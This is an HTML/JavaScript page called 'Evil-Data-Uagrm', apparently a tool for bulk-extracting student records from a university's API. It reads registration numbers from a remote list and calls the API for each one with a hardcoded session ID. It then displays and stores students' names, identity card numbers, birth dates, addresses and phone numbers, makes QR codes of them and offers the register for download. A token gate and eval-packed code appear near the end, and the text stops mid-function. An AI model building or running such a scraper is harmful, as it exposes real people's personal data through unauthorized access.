<!doctype html>
<html lang="es">

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="Extraer datos de la datos universitario">
    <meta name="author" content="Luishino">
    <title>Evil-Data-Uagrm</title>
    <link rel="shortcut icon" href="https://raw.githubusercontent.com/Pericena/happybirthday.github.io/main/img.png" type="image/x-icon">
    <!-- Cargar el CSS de Bootstrap-->
    <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">
    <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"></script>
    <!-- <script src="https://cdnjs.cloudflare.com/ajax/libs/push.js/0.0.11/push.min.js"></script> -->
    <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11.0.20/dist/sweetalert2.all.min.js"></script>
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/sweetalert2@11.0.20/dist/sweetalert2.min.css">
    <!-- <script src="https://rawgit.com/schmich/instascan-builds/master/instascan.min.js"></script> -->
    <script src="instascan.min.js"></script>
    <script src="https://cdn.rawgit.com/davidshimjs/qrcodejs/gh-pages/qrcode.min.js"></script>
    <!-- <script src="qrcode.min.js"></script> -->
<!--    
    https://www.online-toolz.com/langs/es/tool-es-javascript-obfuscator.html -->

</head>

    <style>


body {
  margin: 0;
  padding: 0;
  font-family: Arial, sans-serif;
  background-image: linear-gradient(to bottom, rgba(0, 0, 0, 0.8), rgba(0, 0, 0, 0.8),rgba(0, 0, 0, 0.8)), url('https://raw.githubusercontent.com/Pericena/happybirthday.github.io/main/descarga.png');
  background-image: linear-gradient(to bottom, rgba(0, 0, 0, 0.8), rgba(0, 0, 0, 0.8),rgba(0, 0, 0, 0.8)), url('descarga.png');
  background-repeat: no-repeat;
  background-size: cover;
  background-position: center;
}
  /* background: linear-gradient(to bottom, #1a5276, #2980b9, #7fb3d5); */
  /* background-image: linear-gradient(to bottom, rgba(26, 82, 118, 0.8), rgba(41, 128, 185, 0.8),rgba(127, 179, 213, 0.8)), 
  url('https://github.com/Pericena/happybirthday.github.io/blob/main/descarga.png'); */
/* margin: 0;
  padding: 0;
  font-family: Arial, sans-serif;
  background-image: linear-gradient(to bottom, #171e35, #1a5276), url('https://raw.githubusercontent.com/Pericena/happybirthday.github.io/main/img.png');
  background-repeat: no-repeat;
  background-size: cover; */

.container {
    width: 100%;
  max-width: 1200px;
  margin: 0 auto;
  padding: 0;
  box-sizing: border-box;
}

#buscador {

  
  overflow: auto;
  padding: 1em;
  border-radius: 2px;
  text-align: center;
}

#buscador #capatext {
  display: inline-block;
  margin-top: 0px;
}

#buscador #capatext input {
  height: 35px;
  border-radius: 5px 0px 0px 5px;
  font-size: 14px;
  border: none;
  box-shadow: inset 2px 2px 2px #283048;
  width: 240px;
  color:#3C486B;
 

}

#buscador button {
  width: 80px;
  height: 37px;
  font-size: 14px;
  border-radius: 0px 5px 5px 0px;
  background: #1e245a;
  color:#ffffff;
  border: none;
  margin-left: -4px;
  cursor: pointer;

}
h1{
    color:#ffffff;
    font-size: 16px;
  text-align: center;
}
h2{
    color:#ffffff;
    font-size: 12px;
  text-align: center;
}
#estudiante {
  background-image: linear-gradient(to bottom, rgba(0, 0, 0, 0.8), rgba(0, 0, 0, 0.8),rgba(0, 0, 0, 0.8)), url('https://raw.githubusercontent.com/Pericena/happybirthday.github.io/main/descarga2.png');
  background-image: linear-gradient(to bottom, rgba(0, 0, 0, 0.8), rgba(0, 0, 0, 0.8),rgba(0, 0, 0, 0.8)), url('descarga2.png');
  background-repeat: no-repeat;
  background-size: cover;
  background-position: center;
  padding: 10px;
  color: #ffffff;
  border-radius: 8px;
  width: 300px;
  margin: 8px 0;
  font-size: 14px;
  text-align: justify;
    z-index: 1;
}

/* Estilos para pantallas de hasta 600px de ancho */
@media (max-width: 400px) {
  #estudiante {
    width: 85%;
  }
}
/* Estilos para pantallas de hasta 600px de ancho */
@media (max-width: 350px) {
  #estudiante {
    width: 80%;
  }
}

  
.token-input {
  position: fixed;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  z-index: 9999;
  /* background-color: #080913; */
  background-image: linear-gradient(to bottom, rgba(0, 0, 0, 0.8), rgba(0, 0, 0, 0.8),rgba(0, 9, 17, 0.8)), 
  url('https://raw.githubusercontent.com/Pericena/happybirthday.github.io/main/descarga2.png');
  background-repeat: no-repeat;
  /* opacity: 0.5; */
  background-size: cover;
  display: flex;
  flex-direction: column;
  align-items: center;
  justify-content: center;
  text-align: center;
  }
  .token-input input,
  .token-input button {
    margin-bottom: 8px;
    width:auto;
  height: 30px;
  font-size: 14px;
  border-radius: 5px;
  background: #f5f5f5;
  color:#1e245a;
  

  }


  .token-input button {
  margin-bottom: 8px;
  width:80px;
  height: 30px;
  font-size: 14px;
  border-radius: 5px;
  background: #1e245a;
  color:#ffffff;
  border: none;
  margin-left: -4px;
  cursor: pointer;

  }

  .token-input.hidden {
    display: none;
 
  }

  .mensaje {
    
    margin-top: 2px;
    padding: 2px;
    color: #1e245a;
    font-size: 14px;
    text-align: center;
  }

 #lista-datos2 {
    display: grid;
  grid-template-columns: repeat(4, 1fr);

    list-style-type: none;
    padding: 0;
  }

  #lista-datos2 li {
    list-style-type: none;
    height: 5px;
  border-radius: 0px;
  font-size: 14px;
  border: none;
  box-shadow: inset 4px 4px 4px #283048;

  width: auto;
  color:#ffffff;
  /* background-color: #ffffff; */
  padding: 10px;
  
  } 


  @media (max-width: 600px) {
  #lista-datos {
    grid-template-columns: repeat(2, 1fr);
  }
}

@media (max-width: 480px) {
  #lista-datos {
    grid-template-columns: 1fr;
  }
}
@media (max-width: 380px) {
  #lista-datos {
    grid-template-columns: 1fr;
  }
}

.carousel {
  position: relative;
  overflow: hidden;

  /* width: auto; */
}

.carousel-container {
    
    list-style-type: none;
  display: flex;
  transition: transform 0.3s ease-in-out;
  width: 100%;
}

.carousel-item {
    list-style-type: none;
    transition: transform 0.3s ease-in-out;
  flex: 0 0 100%;
  padding: 20px;
  text-align: center;
  background-color: #f0f0f0;
  border-radius: 8px;
}

@media (max-width: 768px) {
  .carousel-item {
    flex: 0 0 50%;
  }
}

@media (max-width: 480px) {
  .carousel-item {
    flex: 0 0 100%;
  }
}
.carousel-prev,
.carousel-next {
  background-color: #ccc;
  border: none;
  color: #fff;
  font-size: 18px;
  cursor: pointer;
  opacity: 0.7;
  transition: opacity 0.3s ease-in-out;
}
.carousel-prev {
  left: 10px;
}

.carousel-next {
  right: 10px;
}

.carousel-prev:hover,
.carousel-next:hover {
  opacity: 1;
}

#lista-datos {
  display: flex;
  transition: transform 0.3s ease-in-out;
  padding: 0;
  margin: 0;
  
}

#lista-datos li {
    transition: transform 0.3s ease-in-out;
    /* background-image: linear-gradient(to bottom, rgba(255, 255, 255, 0.8), rgba(255, 255, 255, 0.8),rgba(255, 255, 255, 0.8)), 
  url('https://github.com/Pericena/happybirthday.github.io/blob/main/https://github.com/Pericena/happybirthday.github.io/blob/main/descarga.png');
  background-repeat: no-repeat;
  background-size: cover; */
  background: linear-gradient(to bottom, #ffffff, #ffffff, #ffffff);
  padding: 10px;
  color: #1e245a;
  border-radius: 8px;
  width: 300px;
  height: auto;
  margin: 8px 0;
  font-size: 14px;
  text-align: justify;
  flex-shrink: 0;
  margin-right: 10px;

}



  #datos {
    background: linear-gradient(to bottom, #ffffff, #ffffff, #ffffff);
  padding: 10px;
  border-color: #1e245a;
  color: #1e245a;
  border-radius: 8px;
  width: 300px;
  height: auto;
  margin: 8px 0;
  font-size: 14px;
  text-align: justify;
    z-index: 1;

    }
    #datos p {
      margin-bottom: 5px;
    }

    #loading-container {
      display: none;
    position: absolute;
    width: 100%;
    height: 100%;
    top: 50%;
    left: 50%;
    transform: translate(-50%, -50%);
    z-index: 9999;
    background-color: #080913;
    flex-direction: column;
    align-items: center;
    justify-content: center;
    height: 100vh;
    text-align: center;
    }


    .app{
    color: rgb(255, 255, 255);
    font-size: 40px;
    text-align: center;
    justify-content: center;
    align-items: center;
  }
  .splash{
    display: flex;
    text-align: center;
    justify-content: center;
    align-items: center;
    min-height: 600px;
  }
  .splash .ring{
    position: absolute;
    width: 200px;
    height: 200px;
    border-radius: 50%;
    animation: ring 2s linear infinite;
  }
  @keyframes ring {
    0%{
      transform: rotate(0deg);
      box-shadow: 1px 5px 2px #e65c00;
    }
    50%{
      transform: rotate(180deg);
      box-shadow: 1px 5px 2px #18b201;
    }
    100%{
      transform: rotate(360deg);
      box-shadow: 1px 5px 2px #0456c8;
    }
  }
  .splash .ring:before{
    position: absolute;
    content: '';
    left: 0;
    top: 0;
    height: 100%;
    width: 100%;
    border-radius: 50%;
    box-shadow: 0 0 5px rgba(255,255,255,.3);
  }
  .splash span{
    color: #737373;
    font-size: 20px;
    text-transform: uppercase;
    letter-spacing: 1px;
    line-height: 200px;
    animation: text 1s ease-in-out infinite;
  }
  @keyframes text {
    50%{
      color: black;
    }
  }


.custom-image-class {
    max-width: 150px;
    max-height: 150px; 
    }


    .section.category {
  text-align: center;

}

.section.category2 {
  text-align: center;
  background-color: #fff;
}

.section-title {
  margin-bottom: 40px;
}

.has-scrollbar {
  display: flex;
  flex-wrap: nowrap;
  overflow-x: auto;
  padding-bottom: 10px;
  margin-left: -15px;
  margin-right: -15px;
  scrollbar-width: thin;
  scrollbar-color: #1e245a #f7f7f7;
}

.has-scrollbar::-webkit-scrollbar {
  width: 8px;
}

.has-scrollbar::-webkit-scrollbar-track {
  background-color: #f7f7f7;
}

.has-scrollbar::-webkit-scrollbar-thumb {
  background-color: #1e245a;
  border-radius: 10px;
}

.has-scrollbar::-webkit-scrollbar-thumb:hover {
  background-color: #1e245a;
}

.scrollbar-item {
  flex: 0 0 auto;
  width: 330px;
  margin-left: 15px;
  margin-right: 15px;
  
}
.scrollbar-item .card-title {
  margin-top: 10px;
  font-size: 18px;
  font-weight: bold;
  color: #333;
  text-decoration: none;
}
.category-card {
  background-color: #f7f7f7;
  padding: 20px;
  border-radius: 4px;
  box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
  transition: transform 0.3s ease;
}

.category-card:hover {
  transform: translateY(-5px);
}

.card-banner {
  margin-bottom: 20px;
  overflow: hidden;
  position: relative;
  height: 200px;
}

.card-banner .img-holder {
  width: 100%;
  height: 100%;
  background-position: center center;
  background-repeat: no-repeat;
  background-size: cover;
}

.card-title {
  color: #333;
  text-decoration: none;
  font-size: 18px;
  transition: color 0.3s ease;
}

.card-title:hover {
  color: #1e245a;
}

@media (max-width: 767px) {
  .has-scrollbar {
    overflow-x: auto;
    scrollbar-width: thin;
    scrollbar-color: #ccc #f7f7f7;
  }
}


header {
  background-color: #ffffff;
  padding: 20px;
}

.menu {
  display: flex;
  align-items: center;
  justify-content: space-between;
}

.menu-icon {
  font-size: 24px;
  cursor: pointer;
}

.menu-items {
  list-style-type: none;
  margin: 0;
  padding: 0;
  display: flex;
}

.menu-items li {
  margin-right: 20px;
}

.menu-items li:last-child {
  margin-right: 0;
}

.menu-items a {
  text-decoration: none;
  color: #333;
  font-weight: bold;
}

@media (max-width: 768px) {
  .menu-items {
    display: none;
    flex-direction: column;
    position: absolute;
    top: 60px;
    left: 0;
    width: 100%;
    background-color: #ffffff;
    padding: 10px;
  }

  .menu-items li {
    margin: 10px 0;
  }

  #menu-toggle:checked ~ .menu-items {
    display: flex;
  }
}


    </style>
</head>


<body>


    <header>
        <nav class="menu">
          <input hidden type="checkbox" id="menu-toggle" />
          <label for="menu-toggle" class="menu-icon">&#9776;</label>
          <ul class="menu-items">
            <li><a href="#">Inicio</a></li>
            <li><a href="https://lpericena.blogspot.com/">Servicios</a></li>
            <li><a href="https://twitter.com/LPericena">Contacto</a></li>
          </ul>
        </nav>
      </header>
      
      



      <div class="token-input">

        <div id="loading-container">
    
            <!-- <div class="app">
                <div class="splash">
                    <div class="ring"></div>
                    <span>        
                    </span>
                    <img src="https://raw.githubusercontent.com/Pericena/happybirthday.github.io/main/img.png" width="100" height="100" alt="logo">
                 </div>
                 </div>
          </div> -->
        <img src="https://raw.githubusercontent.com/Pericena/happybirthday.github.io/main/img.png" width="100" height="100" alt="logo">
        <h2>by Luishiño</h2>
        <div id="mensaje" class="mensaje hidden"></div>
        <input id="token" type="password" placeholder="Ingrese el token" />
        <button id="introducir">Entrar</button>
        
        
    </div>
   
      

<div class="container">
        <div id="buscador">
            <h1>
                <img src="https://raw.githubusercontent.com/Pericena/happybirthday.github.io/main/img.png" width="25" height="25" alt="logo">
                Ingrese el número de registro</h1>
                <h2>by Luishiño</h2>
           
            <div id="capatext">
            <!-- <input id="registro" type="text" placeholder="Ingrese el número de registro" required> -->
            <input type="number" id="registro" pattern="[0-9]{4,10}" placeholder="Ingrese el número de registro" required>

            <button onclick="mostrarNotificacion()" id="button">Consultar</button>
          

        </div>
            <center>
                <p id="estudiante" class="buscador">
                    +Datos
                </p>
                <p id="registroInvalido" style="color:#F45050"></p>
            </center>
           
            <center>
                <h2>Datos de estudiantes</h2>
                <div id="datos"></div>
               



                <section class="section category" aria-label="category">
                      <!-- <h2 class="h2 section-title">
                        <span class="span">Lista de </span> estudiantes
                      </h2> -->
                      <h2>Lista de estudiantes</h2>
                  
                      <ul class="has-scrollbar">
                        <li class="scrollbar-item" id="lista-datos">
                            
                          <div class="category-card" >
                            <figure class="card-banner img-holder">
                              <img src="https://raw.githubusercontent.com/Pericena/happybirthday.github.io/main/img3.png" width="25" height="25" alt="logo">
                            </figure>
                            <h3 class="h3">
                              <a href="#" class="card-title">Test 1</a>
                            </h3>
                          </div>
                        </li>
                        
                  
                        <!-- Agrega más elementos <li> para cada evento -->
                  
                      </ul>
                  
                   
                  </section>

                <!-- <div class="carousel">
                    <div  class="carousel-container">
                      <div class="carousel-item">Slide 1</div>
                      <div class="carousel-item">Slide 2</div>
                      <div class="carousel-item">Slide 3</div>
                      <div class="carousel-item">Slide 4</div>
                      <div class="carousel-item">Slide 5</div>
                    </div>
                    <button class="carousel-prev">&#8249;</button>
                    <button class="carousel-next">&#8250;</button>
                  </div> -->
                
                  <h2>Lista registro
                    <br>
                    <a href="content://com.sec.android.app.myfiles.FileProvider/device_storage/Download/" target="_black" id="descargarbuton" style="background-color: transparent;color: #fff;border-radius: 4px;cursor: pointer;" >
                        Descargar Datos
                    </a>

                    <!-- <a href="content://com.sec.android.app.myfiles.FileProvider/device_storage/Download/" download>Descargar archivo</a> -->
                </h2>
                  
                      <ul id="lista-datos2" ></ul>

              </center>


              <center>

                <style>
                    #qrcode {
                         display: grid;
                         grid-template-columns: repeat(4, 1fr);
                         grid-gap: 10px;
                         width: 100%;
                         height: 350px;
                        margin: auto;
                         }
                 
                         .qr-item {
                         width: 200px;
                         height: 200px;
                         border: 1px solid #ffffff;

                         }
                                 </style>
                            <h2>qr de estudiantes</h2>
                             <section class="section category" aria-label="category">                              
                                 <ul class="has-scrollbar"  style="background: #ffff; padding: 20px;">
                                   </li>
                                    <li class="scrollbar-item" id="qrcode">
                                   <!-- Agrega más elementos <li> para cada evento -->
                                 </ul>
                             </section>



                <style>
                    #preview{
                       width:300px;
                       height: 300px;
                       border: 1px solid #ffffff;
                    }
                    </style>
                    <h2>Camara qr</h2>
                    <video id="preview"></video>

           


        </center>


        </div>
</div>





</body>
</html>



<script>
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('f.e(\'d\',3(){c 0=b.a(\'9-8\');0.2.1=\'7\';6(3(){0.2.1=\'5\'},4)});',16,16,'loadingContainer|display|style|function|8000|none|setTimeout|block|container|loading|getElementById|document|var|DOMContentLoaded|addEventListener|window'.split('|'),0,{}))

    
</script>
<script>  
// eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3 5=a.7(\'.6-o\');3 c=a.7(\'.6-m\');3 b=a.7(\'.6-l\');3 g=5.7(\'.6-k\').f;3 n=5.f;3 4=5.p.q;r 2=0;c.j(\'i\',()=>{2=(2-1+4)%4;8()});b.j(\'i\',()=>{2=(2+1)%4;8()});d 8(){3 9=-2*g;5.s.t=`9(${9}u)`;e()}d e(){c.h=2===0;b.h=2===4-1}',31,31,'||currentIndex|const|totalItems|carouselContainer|carousel|querySelector|updateCarouselPosition|translateX|document|nextButton|prevButton|function|toggleCarouselControls|offsetWidth|itemWidth|disabled|click|addEventListener|item|next|prev|containerWidth|container|children|length|let|style|transform|px'.split('|'),0,{}))
// Obtener el elemento de video y el área de vista previa
let video = document.getElementById('preview');
let scanner = new Instascan.Scanner({ video: video, mirror: false }); // Agrega la opción 'mirror: false' para desactivar el espejo del video

// Manejar el evento de escaneo
scanner.addListener('scan', function (content) {

  //alert('Código QR escaneado: ' + content);
  Swal.fire({
        title: 'Datos del estudiante',
        text: 'Código QR escaneado: ' + content,
        icon: 'success',
        confirmButtonText: 'Aceptar'
        
      });
});

// Iniciar la cámara y la detección de QR
Instascan.Camera.getCameras().then(function (cameras) {
  let rearCamera = cameras.find(function (camera) {
    return camera.name.toLowerCase().includes('back') || camera.name.toLowerCase().includes('rear');
  });

  if (rearCamera) {
    scanner.start(rearCamera);
  } else {
    console.error('No se encontró una cámara trasera en el dispositivo.');
  }
}).catch(function (error) {
  console.error(error);
});


    </script>




<script>
    const estudianteDiv = document.getElementById('estudiante');
    const inputRegistro = document.getElementById('registro');
    const listaDatos = document.getElementById('lista-datos');
    const listaDatos2 = document.getElementById('lista-datos2');
    const button = document.getElementById('button');
    const tokenInput = document.getElementById('token');
    const introducirButton = document.getElementById('introducir');
    const mensajeDiv = document.getElementById('mensaje');

    // var qr = new QRCode(document.getElementById("qrcode"), {
    //                             text: "HOLA",
    //                             width: 500,
    //                             height: 500,
    //                             colorDark: "#000000",
    //                             colorLight: "#ffffff",
    //                             correctLevel : QRCode.CorrectLevel.H
    //                         });

    //eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('9 8=r.N.B("A/z/y",\'@u-x-w-s-t\').C(r.E.F);2.a(\'n\',G);H.a(\'n\',l);9 6=k.I(\'1\');b(6&&6===8){f.g(\'1-h\')[0].4.j(\'3\');2.7=m}J l(){9 1=d.e;b(1===8){5.o=\'<p>q v�i</p>\';5.4.c(\'3\');d.e=\'\';f.g(\'1-h\')[0].4.j(\'3\');k.K(\'1\',1);2.7=m}L{5.o=\'<p>q M�i</p>\';5.4.c(\'3\');2.7=D}}',50,50,'|token|button|hidden|classList|mensajeDiv|storedToken|disabled|claveToken|const|addEventListener|if|remove|tokenInput|value|document|getElementsByClassName|input|lido|add|localStorage|validarToken|false|click|innerHTML||Token|CryptoJS|by|luishino|elhacker||uagrm|2023|6Lt2CfTESuTfSY0WaXvLf4eITG1xXXJBGMFA8xgUgKj2ebAbzhyEm9EqqZ4dhuUF2pbjWssrl7CESB16hp4xjSwMX4w0mSYzx3zxg|mPXEsBv9xOxoSEo|U2FsdGVkX1|decrypt|toString|true|enc|Utf8|obtenerDatos|introducirButton|getItem|function|setItem|else|inv|AES'.split('|'),0,{}))

    //const claveToken = CryptoJS.AES.decrypt("U2FsdGVkX1/mPXEsBv9xOxoSEo/6Lt2CfTESuTfSY0WaXvLf4eITG1xXXJBGMFA8xgUgKj2ebAbzhyEm9EqqZ4dhuUF2pbjWssrl7CESB16hp4xjSwMX4w0mSYzx3zxg", '@elhacker-2023-uagrm-by-luishino').toString(CryptoJS.enc.Utf8);
    
    //button.addEventListener('click', obtenerDatos);
    //introducirButton.addEventListener('click', validarToken);

    fetch('https://raw.githubusercontent.com/Pericena/happybirthday.github.io/main/token.txt') // Reemplaza con la ruta de tu archivo de texto que contiene el token y la clave
  .then(response => response.text())
  .then(data => {
    const datosArray = data.split('\n');
    const token = datosArray.map(item => item.trim().replace(/[\[\]\r]/g, ''))[0];
    const clave = datosArray.map(item => item.trim().replace(/[\[\]\r]/g, ''))[1];

    //console.log('Token:', token);
    //console.log('clave:', clave);

        const claveToken = CryptoJS.AES.decrypt(token, clave).toString(CryptoJS.enc.Utf8);
       // console.log('claveToken:', claveToken);
        
    button.addEventListener('click', obtenerDatos);
    introducirButton.addEventListener('click', validarToken);
    
    // Verificar si hay un token almacenado en el inicio
    const storedToken = localStorage.getItem('token');
    if (storedToken && storedToken === claveToken) {
      // Token válido almacenado, ocultar el contenedor de entrada de token y habilitar interacción con la página
      
      document.getElementsByClassName('token-input')[0].classList.add('hidden');
      
      button.disabled = false;
    }

    function validarToken() {
      const token = tokenInput.value;

      if (token === claveToken) {
        // Token válido, mostrar mensaje de éxito y ocultar el contenedor de entrada de token
        mensajeDiv.innerHTML = '<p>Token válido</p>';
        mensajeDiv.classList.remove('hidden');
        tokenInput.value = '';
        document.getElementsByClassName('token-input')[0].classList.add('hidden');
      
        Swal.fire({
        title: 'Token válido',
        text: 'Bienvenido a la app',
       /// icon: 'success',
        imageUrl: "https://raw.githubusercontent.com/Pericena/happybirthday.github.io/main/img.png",
        //imageAlt: error,
        customClass: {
            image: 'custom-image-class' // Clase CSS personalizada para la imagen
             }
        
      });

        setTimeout(function() {
             location.reload();
         }, 5000);
        // Guardar el token en el almacenamiento local
        localStorage.setItem('token', token);

        // Habilitar interacción con la página
        button.disabled = false;
      } else {
        // Token inválido, mostrar mensaje de error
        mensajeDiv.innerHTML = '<p>Token inválido</p>';
        mensajeDiv.classList.remove('hidden');
        // Deshabilitar interacción con la página
        Swal.fire({
        title: 'Token inválido',
        text: 'contáctese con el administrador',
        icon: 'error',
       // imageUrl: "https://firebasestorage.googleapis.com/v0/b/imagenes-972f4.appspot.com/o/usuario%2Fimg.png?alt=media&token=4545ef4f-dd7a-4c27-ae12-b0d6a439f239",
        confirmButtonText: 'Aceptar'
        
      });

        button.disabled = true;
      }
    }
  })
  
  .catch(error => {

    Swal.fire({
        title: 'Token inválido',
        text: 'contáctese con el administrador',
        icon: 'error',
       // imageUrl: "https://firebasestorage.googleapis.com/v0/b/imagenes-972f4.appspot.com/o/usuario%2Fimg.png?alt=media&token=4545ef4f-dd7a-4c27-ae12-b0d6a439f239",
        confirmButtonText: 'Aceptar'
        
      });
    console.log('Error al obtener el archivo de datos:', error);
  });


  function guardarDatosEnArchivo() {
  const registros = JSON.parse(localStorage.getItem('registros'));

  // Verificar si hay registros almacenados
  if (registros && registros.length > 0) {
    // Crear el contenido del archivo de texto
    const contenido = registros.join('\n');

    // Obtener el botón de descarga por su ID
    const botonDescarga = document.getElementById('descargarbuton');

    // Asignar el evento de clic al botón
    botonDescarga.addEventListener('click', function() {
      // Crear un enlace de descarga
      const enlace = document.createElement('a');
      enlace.href = 'data:text/plain;charset=utf-8,' + encodeURIComponent(contenido);
      enlace.download = 'registro.txt';

      // Simular el clic en el enlace para iniciar la descarga
      enlace.click();
    });
  } else {
    console.log('No hay registros almacenados para guardar');
  }
}



function getIntroducirRegistros() {
  if (localStorage.getItem('registrosAlmacenados')) {
    // Los registros ya se han almacenado previamente, no es necesario volver a cargarlos
    return;
  }
  fetch('https://raw.githubusercontent.com/Pericena/happybirthday.github.io/main/lista.txt') // Reemplaza con la ruta de tu archivo de texto
    .then(response => response.text())
    .then(registros => {
      var registrosArray = registros.split('\n').filter(registro => registro.trim() !== '');


      // Almacenar los registros en el almacenamiento local
      localStorage.setItem('registros', JSON.stringify(registrosArray));
      var index = 0;
      var interval = setInterval(function() {
        if (index < registrosArray.length) {
          var registro = registrosArray[index];
          introducirRegistroDesdeAPI(registro);
          index++;
        } else {
          clearInterval(interval);

          // Todos los registros han sido introducidos, almacenar la bandera en el almacenamiento local
          localStorage.setItem('registrosAlmacenados', true);
        }
      }, 8000);
    })
    .catch(error => {
      console.log('Error al obtener el archivo de registros:', error);
    });
}

function introducirRegistroDesdeAPI(registro) {
  var url = `https://caiuagrm.com/apicai/api/v1/estudiantes/datos-universidad/${registro}?session_id=208e85c2-5322-4596-aafc-c5c153700740`;

  fetch(url)
    .then(response => {
      if (response.ok) {
        console.log('Registro introducido exitosamente:', registro);
      } else {
        console.log('Error al introducir el registro:', registro);
      }
    })
    .catch(error => {
      console.log('Error en la solicitud API:', error);
    });
}

window.addEventListener('DOMContentLoaded', function() {
  getIntroducirRegistros();
});

function mostrarDatosRegistrados() {
  listaDatos.innerHTML = ''; // Limpiar la lista de datos

  // Obtener los datos registrados del almacenamiento local
// Obtener los datos registrados del almacenamiento local
const registros = localStorage.getItem('registros');
let datosRegistrados = registros ? JSON.parse(registros) : [];

// Filtrar los valores nulos del arreglo de datos registrados
datosRegistrados = datosRegistrados.filter(valor => valor !== null && valor !== undefined);

// Guardar los datos actualizados en el almacenamiento local
localStorage.setItem('registros', JSON.stringify(datosRegistrados));
// Verificar si los datos ya existen antes de guardarlos
// Verificar si el registro no es null o vacío antes de realizar la solicitud al servidor
  if (registros !== null && registro !== '') {



    const datosRegistrados = JSON.parse(registros);
    //console.log("datosRegistrados",datosRegistrados)
    // Recorrer los datos registrados y agregarlos a la lista
    datosRegistrados.forEach(registro => {
      // Realizar la solicitud de los datos al servidor
      const url = `https://caiuagrm.com/apicai/api/v1/estudiantes/datos-universidad/${registro}?session_id=208e85c2-5322-4596-aafc-c5c153700740`;

      fetch(url)
        .then(response => response.json())
        .then(data => {
          const estudiante = data.data;
          const nombre = estudiante.nombre;
          const ci = estudiante.ci;
          const lugar_ci = estudiante.lugar_ci;
          const activo = estudiante.activo;
          const sexo = estudiante.sexo;
          const fecha_nac = estudiante.fecha_nac;
          const direccion = estudiante.direccion;
          const telefono = estudiante.telefono;
          const tel_celular = estudiante.tel_celular;
          const carrera = estudiante.des_carrera;
          const facultad = estudiante.facultad;
          const apellido_pri = estudiante.apellido_pri;
          const apellido_seg = estudiante.apellido_seg;
          const registro = estudiante.registro;

          const listItem = document.createElement('li');
          listItem.innerHTML = `
            <p><strong>Nombre:</strong> ${nombre} ${apellido_pri} ${apellido_seg}</p>
            <p><strong>Cédula de identidad:</strong> ${ci} ${lugar_ci}</p>
            <p><strong>Registro:</strong> ${registro}</p>
            <p><strong>Activo:</strong> ${activo}</p>
            <p><strong>Sexo:</strong> ${sexo}</p>
            <p><strong>Fecha de nacimiento:</strong> ${fecha_nac}</p>
            <p><strong>Dirección:</strong> ${direccion}</p>
            <p><strong>Teléfono:</strong> ${telefono}</p>
            <p><strong>Teléfono celular:</strong> ${tel_celular}</p>
            <p><strong>Carrera:</strong> ${carrera}</p>
            <p><strong>Facultad:</strong> ${facultad}</p>
            
          `;

          listaDatos.appendChild(listItem);


          const datosEstudiante = "Nombre: " + nombre + " " + apellido_pri + " " + apellido_seg + "\n" +
            "Registro: " + registro + "\n" +
            "Carrera: " + carrera;
  
           var qr = new QRCode(document.getElementById("qrcode"), {
                                 text: datosEstudiante,
                                 width: 300,
                                 height: 300,
                                 colorDark: "#000000",
                                 colorLight: "#ffffff",
                                 correctLevel : QRCode.CorrectLevel.H
                             });
        })
        .catch(error => {
          // Error en la solicitud
          const listItem = document.createElement('li');
          listItem.textContent = `Error al obtener los datos del registro ${registro}`;
          listaDatos.appendChild(listItem);
        });
    });
  }
}

   function mostrarDatosRegistrados2() {
     listaDatos2.innerHTML = ''; // Limpiar la lista de datos

     // Obtener los datos registrados del almacenamiento local
     const registros = localStorage.getItem('registros');

     if (registros) {
       const datosRegistrados = JSON.parse(registros);

       // Recorrer los datos registrados y agregarlos a la lista
       datosRegistrados.forEach(registro => {
         const listItem = document.createElement('li');
         listItem.textContent = registro;
         listaDatos2.appendChild(listItem);
       });
     }
   }

   function guardarRegistro(registro) {
  // Obtener los datos registrados del almacenamiento local
  const registros = localStorage.getItem('registros');

  let datosRegistrados = [];

  if (registros) {
    datosRegistrados = JSON.parse(registros);
  }

  // Agregar el nuevo registro a la lista de datos registrados
  datosRegistrados.push(registro);

  // Eliminar datos repetidos utilizando un nuevo Set y Array.from
  datosRegistrados = Array.from(new Set(datosRegistrados));

  // Guardar los datos actualizados en el almacenamiento local
  localStorage.setItem('registros', JSON.stringify(datosRegistrados));
}



function mostrarNotificacion2(nombreCompleto) {
      Swal.fire({
        title: 'Datos del estudiante',
        text: `Se obtuvieron los datos de ${nombreCompleto}`,
        icon: 'success',
        //imageUrl: "https://firebasestorage.googleapis.com/v0/b/imagenes-972f4.appspot.com/o/usuario%2Fimg.png?alt=media&token=4545ef4f-dd7a-4c27-ae12-b0d6a439f239",
        confirmButtonText: 'Aceptar'
        
      });
      
    }


function mostrarNotificacion(nombreCompleto) {
  // Verificar si el nombre completo es nulo o no definido
  if (nombreCompleto !== null && nombreCompleto !== undefined) {
    // Verificar si el navegador admite las notificaciones
    if ('Notification' in window) {
      // Verificar si las notificaciones están permitidas
      if (Notification.permission === 'granted') {
        // Crear y mostrar la notificación
        const notificacion = new Notification('Datos del estudiante', {
          body: `Se obtuvieron los datos de ${nombreCompleto}`,
